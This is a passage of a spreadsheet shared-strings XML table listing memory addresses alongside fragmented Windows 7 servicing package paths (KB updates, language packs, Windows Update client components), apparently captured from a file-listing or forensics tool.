  <si>
    <t>0xde8ee3a8</t>
  </si>
  <si>
    <t>364e35~x86~ar</t>
  </si>
  <si>
    <t>-SA~7.1.760</t>
  </si>
  <si>
    <t>0xde8ee6f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-TerminalServices-CommandLineTools-Package~31bf38</t>
  </si>
  <si>
    <t>0xde8ee7b0</t>
  </si>
  <si>
    <t>364e35~x86~it</t>
  </si>
  <si>
    <t>-IT~7.1.760</t>
  </si>
  <si>
    <t>0xde8eeae0</t>
  </si>
  <si>
    <t>0xde8eeb98</t>
  </si>
  <si>
    <t>-TW~7.1.760</t>
  </si>
  <si>
    <t>0xde8eef80</t>
  </si>
  <si>
    <t>364e35~x86~ru</t>
  </si>
  <si>
    <t>-RU~7.1.760</t>
  </si>
  <si>
    <t>0xde8ef2c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-DownlevelApisets-Base-WinIP-Package~31bf3</t>
  </si>
  <si>
    <t>86~th-TH~7.</t>
  </si>
  <si>
    <t>0xde8ef6c8</t>
  </si>
  <si>
    <t>86~fr-FR~7.</t>
  </si>
  <si>
    <t>0xde8efa18</t>
  </si>
  <si>
    <t>6~en-US~6.1</t>
  </si>
  <si>
    <t>.7600.</t>
  </si>
  <si>
    <t>0xde8efad0</t>
  </si>
  <si>
    <t>86~~7.1.760</t>
  </si>
  <si>
    <t>0xde8efeb8</t>
  </si>
  <si>
    <t>364e35~x86~cs</t>
  </si>
  <si>
    <t>-CZ~7.1.760</t>
  </si>
  <si>
    <t>0xde8f01a0</t>
  </si>
  <si>
    <t>64e35~x86~~6.</t>
  </si>
  <si>
    <t>0xde8f0258</t>
  </si>
  <si>
    <t>86~sk-SK~7.</t>
  </si>
  <si>
    <t>0xde8f0660</t>
  </si>
  <si>
    <t>86~bg-BG~7.</t>
  </si>
  <si>
    <t>0xde8f09b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB978601_RTM~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f0a68</t>
  </si>
  <si>
    <t>86~nb-NO~7.</t>
  </si>
  <si>
    <t>0xde8f0d98</t>
  </si>
  <si>
    <t>.7601.</t>
  </si>
  <si>
    <t>0xde8f0e50</t>
  </si>
  <si>
    <t>86~fi-FI~7.</t>
  </si>
  <si>
    <t>0xde8f1170</t>
  </si>
  <si>
    <t>86~en-GB~7.</t>
  </si>
  <si>
    <t>0xde8f1578</t>
  </si>
  <si>
    <t>86~ro-RO~7.</t>
  </si>
  <si>
    <t>0xde8f1980</t>
  </si>
  <si>
    <t>86~pl-PL~7.</t>
  </si>
  <si>
    <t>0xde8f1d88</t>
  </si>
  <si>
    <t>86~pt-BR~7.</t>
  </si>
  <si>
    <t>0xde8f2218</t>
  </si>
  <si>
    <t>86~nl-NL~7.</t>
  </si>
  <si>
    <t>0xde8f2620</t>
  </si>
  <si>
    <t>86~tr-TR~7.</t>
  </si>
  <si>
    <t>0xde8f2a28</t>
  </si>
  <si>
    <t>86~el-GR~7.</t>
  </si>
  <si>
    <t>0xde8f2d78</t>
  </si>
  <si>
    <t>US~6.1.7600</t>
  </si>
  <si>
    <t>0xde8f2e30</t>
  </si>
  <si>
    <t>86~en-US~7.</t>
  </si>
  <si>
    <t>0xde8f3038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_37_for_KB4483187~31bf3856ad364e35~x86~~11.2.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f3478</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-Package-MiniLP~31bf3856ad364e35</t>
  </si>
  <si>
    <t>~x86~en-US~11</t>
  </si>
  <si>
    <t>.2.9600.164</t>
  </si>
  <si>
    <t>28.mum</t>
  </si>
  <si>
    <t>0xde8f37a8</t>
  </si>
  <si>
    <t>0xde8f3ad0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad3</t>
  </si>
  <si>
    <t>0xde8f3b88</t>
  </si>
  <si>
    <t>86~et-EE~7.</t>
  </si>
  <si>
    <t>0xde8f43c8</t>
  </si>
  <si>
    <t>86~he-IL~7.</t>
  </si>
  <si>
    <t>0xde8f46f8</t>
  </si>
  <si>
    <t>0xde8f47b0</t>
  </si>
  <si>
    <t>86~hu-HU~7.</t>
  </si>
  <si>
    <t>0xde8f4b98</t>
  </si>
  <si>
    <t>86~de-DE~7.</t>
  </si>
  <si>
    <t>0xde8f4ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB979309~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f4f80</t>
  </si>
  <si>
    <t>86~es-ES~7.</t>
  </si>
  <si>
    <t>0xde8f5300</t>
  </si>
  <si>
    <t>86~hi-IN~7.</t>
  </si>
  <si>
    <t>0xde8f57b0</t>
  </si>
  <si>
    <t>86~ja-JP~7.</t>
  </si>
  <si>
    <t>0xde8f5ae0</t>
  </si>
  <si>
    <t>0xde8f5b98</t>
  </si>
  <si>
    <t>86~lv-LV~7.</t>
  </si>
  <si>
    <t>0xde8f5f80</t>
  </si>
  <si>
    <t>86~zh-HK~7.</t>
  </si>
  <si>
    <t>0xde8f6288</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_83_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f6340</t>
  </si>
  <si>
    <t>86~zh-CN~7.</t>
  </si>
  <si>
    <t>0xde8f6748</t>
  </si>
  <si>
    <t>86~sr-LATN-</t>
  </si>
  <si>
    <t>CS~7.1</t>
  </si>
  <si>
    <t>.7601.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f6a78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB978601~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f6b30</t>
  </si>
  <si>
    <t>86~lt-LT~7.</t>
  </si>
  <si>
    <t>0xde8f6e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB3159398~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f6f18</t>
  </si>
  <si>
    <t>86~ko-KR~7.</t>
  </si>
  <si>
    <t>0xde8f7258</t>
  </si>
  <si>
    <t>0xde8f7670</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB2992611~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f7728</t>
  </si>
  <si>
    <t>0xde8f7b30</t>
  </si>
  <si>
    <t>0xde8f7e60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2952664_SP1~31bf3856ad364e35~x86~~6.1.23.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f7f18</t>
  </si>
  <si>
    <t>0xde8f82c0</t>
  </si>
  <si>
    <t>86~zh-TW~7.</t>
  </si>
  <si>
    <t>0xde8f8610</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB979309_RTM~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f86c8</t>
  </si>
  <si>
    <t>86~ru-RU~7.</t>
  </si>
  <si>
    <t>0xde8f8a18</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_188_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f8ad0</t>
  </si>
  <si>
    <t>0xde8f8eb8</t>
  </si>
  <si>
    <t>0xde8f9038</t>
  </si>
  <si>
    <t>0xde8f90f8</t>
  </si>
  <si>
    <t>0xde8f9288</t>
  </si>
  <si>
    <t>0xde8f9740</t>
  </si>
  <si>
    <t>0xde8f97f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2653956_RTM~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f9be0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2653956~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8f9eb8</t>
  </si>
  <si>
    <t>0xde8fa038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~x86~~6.1.7601</t>
  </si>
  <si>
    <t>0xde8fa0f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~~6.1.7601.17</t>
  </si>
  <si>
    <t>0xde8fa598</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-DownlevelApisets-Com-WinIP-Package~31bf38</t>
  </si>
  <si>
    <t>6~fr-FR~7.1</t>
  </si>
  <si>
    <t>16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fa9a0</t>
  </si>
  <si>
    <t>6~~7.1.7601</t>
  </si>
  <si>
    <t>.16492</t>
  </si>
  <si>
    <t>0xde8fad98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_170_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fae50</t>
  </si>
  <si>
    <t>0xde8fb038</t>
  </si>
  <si>
    <t>6~th-TH~7.1</t>
  </si>
  <si>
    <t>0xde8fb400</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-AdmComp~31bf3856ad364e35~x86~en-US~7.6.76</t>
  </si>
  <si>
    <t>00.256.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xde8fb4b8</t>
  </si>
  <si>
    <t>6~bg-BG~7.1</t>
  </si>
  <si>
    <t>0xde8fb8c0</t>
  </si>
  <si>
    <t>6~nb-NO~7.1</t>
  </si>
  <si>
    <t>0xde8fbc10</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_1_for_KB2515325~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fbcc8</t>
  </si>
  <si>
    <t>6~fi-FI~7.1</t>
  </si>
  <si>
    <t>0xde8fbf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_425_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fc038</t>
  </si>
  <si>
    <t>6~sk-SK~7.1</t>
  </si>
  <si>
    <t>0xde8fc300</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientTools-Package~31bf3856ad364e35</t>
  </si>
  <si>
    <t>0xde8fc3b8</t>
  </si>
  <si>
    <t>6~ro-RO~7.1</t>
  </si>
  <si>
    <t>0xde8fc7a0</t>
  </si>
  <si>
    <t>6~pl-PL~7.1</t>
  </si>
  <si>
    <t>0xde8fcb98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685813_SP1~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fcc50</t>
  </si>
  <si>
    <t>6~pt-BR~7.1</t>
  </si>
  <si>
    <t>0xde8fd3a8</t>
  </si>
  <si>
    <t>6~tr-TR~7.1</t>
  </si>
  <si>
    <t>0xde8fd6f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_18_for_KB2750841~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fd7b0</t>
  </si>
  <si>
    <t>6~el-GR~7.1</t>
  </si>
  <si>
    <t>0xde8fdb98</t>
  </si>
  <si>
    <t>6~en-US~7.1</t>
  </si>
  <si>
    <t>0xde8fdec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Aux-AuxComp~31bf3856ad364e35~x86~~7.6.7600.256</t>
  </si>
  <si>
    <t>0xde8fdf80</t>
  </si>
  <si>
    <t>6~en-GB~7.1</t>
  </si>
  <si>
    <t>0xde8fe2c0</t>
  </si>
  <si>
    <t>6~de-DE~7.1</t>
  </si>
  <si>
    <t>0xde8fe610</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB979309~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8fe6c8</t>
  </si>
  <si>
    <t>6~es-ES~7.1</t>
  </si>
  <si>
    <t>0xde8feae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_84_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8feb98</t>
  </si>
  <si>
    <t>6~et-EE~7.1</t>
  </si>
  <si>
    <t>0xde8fef80</t>
  </si>
  <si>
    <t>6~nl-NL~7.1</t>
  </si>
  <si>
    <t>0xde8ff1a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_55_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ff258</t>
  </si>
  <si>
    <t>6~lv-LV~7.1</t>
  </si>
  <si>
    <t>0xde8ff660</t>
  </si>
  <si>
    <t>6~zh-HK~7.1</t>
  </si>
  <si>
    <t>0xde8ff9b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB3046480~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K_x001B_[150</t>
  </si>
  <si>
    <t>0xde8ffa68</t>
  </si>
  <si>
    <t>6~he-IL~7.1</t>
  </si>
  <si>
    <t>0xde8ffd98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_33_for_KB3042058~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde8ffe50</t>
  </si>
  <si>
    <t>6~hu-HU~7.1</t>
  </si>
  <si>
    <t>0xde900348</t>
  </si>
  <si>
    <t>6~~6.1.7601</t>
  </si>
  <si>
    <t>0xde9005d0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3023215~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde900688</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_73_for_KB3080149~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9009b0</t>
  </si>
  <si>
    <t>6~hi-IN~7.1</t>
  </si>
  <si>
    <t>0xde900db8</t>
  </si>
  <si>
    <t>6~ja-JP~7.1</t>
  </si>
  <si>
    <t>0xde901100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-RasCMAK-Package~31bf3856ad364e35~x86~~6.1.7601.1</t>
  </si>
  <si>
    <t>0xde9011f8</t>
  </si>
  <si>
    <t>6~zh-CN~7.1</t>
  </si>
  <si>
    <t>0xde901600</t>
  </si>
  <si>
    <t>6~sr-LATN-C</t>
  </si>
  <si>
    <t>S~7.1.</t>
  </si>
  <si>
    <t>7601.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde901950</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_169_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde901a08</t>
  </si>
  <si>
    <t>6~lt-LT~7.1</t>
  </si>
  <si>
    <t>0xde901df0</t>
  </si>
  <si>
    <t>6~ko-KR~7.1</t>
  </si>
  <si>
    <t>0xde9021c0</t>
  </si>
  <si>
    <t>6~uk-UA~7.1</t>
  </si>
  <si>
    <t>0xde9025c8</t>
  </si>
  <si>
    <t>6~da-DK~7.1</t>
  </si>
  <si>
    <t>0xde902918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-ActiveX~31bf3856ad364e35~x86~~7.6.7600.256.mum</t>
  </si>
  <si>
    <t>0xde9029d0</t>
  </si>
  <si>
    <t>6~sl-SI~7.1</t>
  </si>
  <si>
    <t>0xde902d00</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_440_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde902db8</t>
  </si>
  <si>
    <t>6~pt-PT~7.1</t>
  </si>
  <si>
    <t>0xde903100</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2894844~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9034e0</t>
  </si>
  <si>
    <t>6~ru-RU~7.1</t>
  </si>
  <si>
    <t>0xde903830</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2515325_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9038e8</t>
  </si>
  <si>
    <t>6~sv-SE~7.1</t>
  </si>
  <si>
    <t>0xde903c38</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-AdmComp~31bf3856ad364e35~x86~~7.6.7600.25</t>
  </si>
  <si>
    <t>0xde903cf0</t>
  </si>
  <si>
    <t>6~hr-HR~7.1</t>
  </si>
  <si>
    <t>0xde9042f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_87_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9043a8</t>
  </si>
  <si>
    <t>6~cs-CZ~7.1</t>
  </si>
  <si>
    <t>0xde9047b0</t>
  </si>
  <si>
    <t>6~ar-SA~7.1</t>
  </si>
  <si>
    <t>0xde904b98</t>
  </si>
  <si>
    <t>6~it-IT~7.1</t>
  </si>
  <si>
    <t>0xde904ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_32_for_KB2973351~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde904f80</t>
  </si>
  <si>
    <t>6~zh-TW~7.1</t>
  </si>
  <si>
    <t>0xde905208</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_169_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9052c0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-DownlevelApisets-Shell-WinIP-Package~31bf</t>
  </si>
  <si>
    <t>3856ad364e35~</t>
  </si>
  <si>
    <t>x86~fi-FI~7</t>
  </si>
  <si>
    <t>.1.760</t>
  </si>
  <si>
    <t>1.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9056c8</t>
  </si>
  <si>
    <t>x86~th-TH~7</t>
  </si>
  <si>
    <t>0xde905ad0</t>
  </si>
  <si>
    <t>x86~fr-FR~7</t>
  </si>
  <si>
    <t>0xde905ec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB3046480~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde905f80</t>
  </si>
  <si>
    <t>x86~~7.1.76</t>
  </si>
  <si>
    <t>01.164</t>
  </si>
  <si>
    <t>92.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde906300</t>
  </si>
  <si>
    <t>x86~pt-BR~7</t>
  </si>
  <si>
    <t>0xde906650</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_190_for_KB3004375~31bf3856ad364e35~x86~~6.1.3.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde906708</t>
  </si>
  <si>
    <t>x86~sk-SK~7</t>
  </si>
  <si>
    <t>0xde906b10</t>
  </si>
  <si>
    <t>x86~bg-BG~7</t>
  </si>
  <si>
    <t>0xde906f18</t>
  </si>
  <si>
    <t>x86~nb-NO~7</t>
  </si>
  <si>
    <t>0xde9072a8</t>
  </si>
  <si>
    <t>0xde907360</t>
  </si>
  <si>
    <t>0xde907748</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3172605~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde907960</t>
  </si>
  <si>
    <t>x86~ro-RO~7</t>
  </si>
  <si>
    <t>0xde907e30</t>
  </si>
  <si>
    <t>x86~pl-PL~7</t>
  </si>
  <si>
    <t>0xde908278</t>
  </si>
  <si>
    <t>x86~tr-TR~7</t>
  </si>
  <si>
    <t>0xde908680</t>
  </si>
  <si>
    <t>x86~el-GR~7</t>
  </si>
  <si>
    <t>0xde908a68</t>
  </si>
  <si>
    <t>x86~en-US~7</t>
  </si>
  <si>
    <t>0xde908d98</t>
  </si>
  <si>
    <t>0xde908e50</t>
  </si>
  <si>
    <t>x86~en-GB~7</t>
  </si>
  <si>
    <t>0xde909660</t>
  </si>
  <si>
    <t>x86~es-ES~7</t>
  </si>
  <si>
    <t>0xde909a68</t>
  </si>
  <si>
    <t>x86~et-EE~7</t>
  </si>
  <si>
    <t>0xde909d98</t>
  </si>
  <si>
    <t>0xde909e50</t>
  </si>
  <si>
    <t>x86~nl-NL~7</t>
  </si>
  <si>
    <t>0xde90a038</t>
  </si>
  <si>
    <t>x86~de-DE~7</t>
  </si>
  <si>
    <t>0xde90a400</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_33_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90a4b8</t>
  </si>
  <si>
    <t>x86~zh-HK~7</t>
  </si>
  <si>
    <t>0xde90a8c0</t>
  </si>
  <si>
    <t>x86~he-IL~7</t>
  </si>
  <si>
    <t>0xde90acc8</t>
  </si>
  <si>
    <t>x86~hu-HU~7</t>
  </si>
  <si>
    <t>0xde90af80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_4_for_KB2750841~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90b038</t>
  </si>
  <si>
    <t>x86~lv-LV~7</t>
  </si>
  <si>
    <t>0xde90b3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-OfflineFiles-Package~31bf3856ad364e35~x86~en-US~</t>
  </si>
  <si>
    <t>0xde90b480</t>
  </si>
  <si>
    <t>x86~ko-KR~7</t>
  </si>
  <si>
    <t>1.16492.mum_x001B_[0K_x001B_[129G</t>
  </si>
  <si>
    <t>0xde90b7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_88_for_KB2871997~31bf3856ad364e35~x86~~6.1.2.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90b868</t>
  </si>
  <si>
    <t>x86~hi-IN~7</t>
  </si>
  <si>
    <t>0xde90bc50</t>
  </si>
  <si>
    <t>x86~ja-JP~7</t>
  </si>
  <si>
    <t>0xde90bf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2533552~31bf3856ad364e35~x86~~6.1.1.1.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90c2f0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2534366~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90c3a8</t>
  </si>
  <si>
    <t>x86~pt-PT~7</t>
  </si>
  <si>
    <t>0xde90c6f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_276_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90c7b0</t>
  </si>
  <si>
    <t>x86~zh-CN~7</t>
  </si>
  <si>
    <t>0xde90cb98</t>
  </si>
  <si>
    <t>x86~sr-LATN</t>
  </si>
  <si>
    <t>-CS~7.</t>
  </si>
  <si>
    <t>1.7601.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90cf80</t>
  </si>
  <si>
    <t>x86~lt-LT~7</t>
  </si>
  <si>
    <t>0xde90d388</t>
  </si>
  <si>
    <t>x86~hr-HR~7</t>
  </si>
  <si>
    <t>0xde90d790</t>
  </si>
  <si>
    <t>x86~uk-UA~7</t>
  </si>
  <si>
    <t>0xde90dae0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SUA-Package~31bf3856ad364e35~x86~~6.1.7600.16385</t>
  </si>
  <si>
    <t>0xde90db98</t>
  </si>
  <si>
    <t>x86~da-DK~7</t>
  </si>
  <si>
    <t>0xde90df80</t>
  </si>
  <si>
    <t>x86~sl-SI~7</t>
  </si>
  <si>
    <t>0xde90e288</t>
  </si>
  <si>
    <t>x86~ru-RU~7</t>
  </si>
  <si>
    <t>0xde90e5d8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SUA-Package~31bf3856ad364e35~x86~en-US~6.1.7600.</t>
  </si>
  <si>
    <t>0xde90e690</t>
  </si>
  <si>
    <t>x86~sv-SE~7</t>
  </si>
  <si>
    <t>0xde90ead0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2685811~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90eec8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\WUClient-SelfUpdate-Core-CoreComp~31bf3856ad364e35~x86~en-US~7.6.7</t>
  </si>
  <si>
    <t>600.256.mum_x001B_[</t>
  </si>
  <si>
    <t>0xde90ef80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2653956_SP1~31bf3856ad364e35~x86~~6.1.1.5.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90f180</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_2_for_KB2534366~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde90f238</t>
  </si>
  <si>
    <t>x86~cs-CZ~7</t>
  </si>
  <si>
    <t>0xde90f588</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-SUA-Package~31bf3856ad364e35~x86~en-US~6.1.7601.</t>
  </si>
  <si>
    <t>0xde90f640</t>
  </si>
  <si>
    <t>x86~ar-SA~7</t>
  </si>
  <si>
    <t>0xde90fa48</t>
  </si>
  <si>
    <t>x86~it-IT~7</t>
  </si>
  <si>
    <t>0xde90fe50</t>
  </si>
  <si>
    <t>x86~zh-TW~7</t>
  </si>
  <si>
    <t>0xde910150</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31</t>
  </si>
  <si>
    <t>5~x86~fi-FI</t>
  </si>
  <si>
    <t>~7.1.7</t>
  </si>
  <si>
    <t>601.16492.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9104a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~x86~en-US</t>
  </si>
  <si>
    <t>0xde910558</t>
  </si>
  <si>
    <t>5~x86~th-TH</t>
  </si>
  <si>
    <t>0xde910a28</t>
  </si>
  <si>
    <t>5~x86~fr-FR</t>
  </si>
  <si>
    <t>0xde910d78</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_8_for_KB2685813~31bf3856ad364e35~x86~~6.1.1.11.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde910e30</t>
  </si>
  <si>
    <t>5~x86~~7.1.</t>
  </si>
  <si>
    <t>0xde911200</t>
  </si>
  <si>
    <t>5~x86~pt-BR</t>
  </si>
  <si>
    <t>0xde9115e8</t>
  </si>
  <si>
    <t>5~x86~sk-SK</t>
  </si>
  <si>
    <t>0xde911918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-ServicingBaseline-Ultimate-Package~31bf3856ad364</t>
  </si>
  <si>
    <t>0xde9119d0</t>
  </si>
  <si>
    <t>5~x86~bg-BG</t>
  </si>
  <si>
    <t>0xde911db8</t>
  </si>
  <si>
    <t>5~x86~nb-NO</t>
  </si>
  <si>
    <t>0xde912468</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_5_for_KB2534366~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde912520</t>
  </si>
  <si>
    <t>5~x86~en-GB</t>
  </si>
  <si>
    <t>0xde912918</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-OfflineFiles-Package~31bf3856ad364e35~x86~~6.1.7</t>
  </si>
  <si>
    <t>0xde9129d0</t>
  </si>
  <si>
    <t>5~x86~ro-RO</t>
  </si>
  <si>
    <t>0xde912db8</t>
  </si>
  <si>
    <t>5~x86~pl-PL</t>
  </si>
  <si>
    <t>0xde913038</t>
  </si>
  <si>
    <t>5~x86~en-US</t>
  </si>
  <si>
    <t>0xde913440</t>
  </si>
  <si>
    <t>5~x86~nl-NL</t>
  </si>
  <si>
    <t>0xde913790</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2515325~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde913848</t>
  </si>
